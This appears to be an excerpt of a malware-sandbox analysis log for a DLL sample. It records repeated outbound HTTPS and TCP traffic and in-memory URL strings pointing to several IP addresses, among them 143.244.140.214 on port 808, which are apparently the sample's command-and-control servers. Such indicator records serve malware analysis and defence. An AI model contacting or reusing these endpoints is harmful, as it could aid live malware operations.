                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50153
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50154
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50217 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50162
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50161
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50209
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50146 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50201
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50169
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50202
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50170
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:48:59 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:49:01 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:49:05 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:49:07 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:49:10 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:49:11 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:49:14 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:49:15 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:49:18 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:49:19 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:49:22 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:49:23 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:49:27 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:49:27 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:49:31 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:49:31 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:49:34 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:49:35 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:49:38 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:49:39 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:49:42 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:49:43 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:49:47 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:49:47 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:49:51 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:49:51 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:49:55 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:49:55 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:49:59 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:49:59 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:50:03 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:50:03 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:50:07 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:50:07 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:50:11 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:50:11 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:50:15 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:50:15 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:50:19 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:50:19 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:50:22 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:50:23 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:50:26 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:50:26 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:50:30 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:50:30 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:50:34 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:50:34 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:50:38 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:50:38 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:50:42 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:50:42 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:50:45 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:50:46 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:50:49 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:50:50 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:50:53 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:50:53 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:50:57 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:50:58 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:01 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:01 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:05 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:05 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:09 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:09 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:13 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:13 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:16 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:17 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:20 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:21 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:25 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:25 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:29 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:29 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:33 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:33 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:37 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:37 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:41 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:41 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:44 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:45 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:48 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:48 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:52 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:52 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:57 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:51:57 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:01 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:52:01 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: rundll32.exe, 00000003.00000003.794272276.0000000000FCA000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root
                      Source: loaddll32.exe, 00000000.00000003.1084086671.00000000008DE000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.789261071.0000000000F8D000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: loaddll32.exe, 00000000.00000003.854639892.00000000008B5000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: loaddll32.exe, 00000000.00000002.1188340275.0000000000878000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.796240223.0000000000F88000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.3.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: rundll32.exe, 00000003.00000003.796430031.00000000053DE000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ddb50579119bf
                      Source: rundll32.exe, 00000003.00000003.901239497.0000000000F88000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabj
                      Source: loaddll32.exe, 00000000.00000003.1075937158.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://14.77.0.96:6891/
                      Source: loaddll32.exe, 00000000.00000003.1084086671.00000000008DE000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.901239497.0000000000F88000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214/
                      Source: rundll32.exe, 00000003.00000003.901239497.0000000000F88000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214/iG
                      Source: loaddll32.exe, 00000000.00000003.1084086671.00000000008DE000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.883045834.0000000000FED000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/
                      Source: rundll32.exe, 00000003.00000003.838578926.0000000000F88000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/$
                      Source: rundll32.exe, 00000003.00000003.838578926.0000000000F88000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/(
                      Source: loaddll32.exe, 00000000.00000003.854569663.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/.140.214:808/
                      Source: loaddll32.exe, 00000000.00000003.909234688.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/.140.214:808/My
                      Source: rundll32.exe, 00000003.00000003.901239497.0000000000F88000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/9O
                      Source: rundll32.exe, 00000003.00000003.838578926.0000000000F88000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/H
                      Source: loaddll32.exe, 00000000.00000003.1084086671.00000000008DE000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.901239497.0000000000F88000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/My
                      Source: loaddll32.exe, 00000000.00000003.1084086671.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/Q
                      Source: loaddll32.exe, 00000000.00000003.1084086671.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/_
                      Source: loaddll32.exe, 00000000.00000003.882972494.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/em32
                      Source: loaddll32.exe, 00000000.00000003.854569663.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/f
                      Source: loaddll32.exe, 00000000.00000003.1127362988.00000000008DE000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1059602410.00000000008DE000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.1140521108.0000000000F88000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.1179012306.0000000000F88000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/hy
                      Source: loaddll32.exe, 00000000.00000003.866464673.00000000008DE000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/hy(
                      Source: rundll32.exe, 00000003.00000003.901239497.0000000000F88000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/hypA
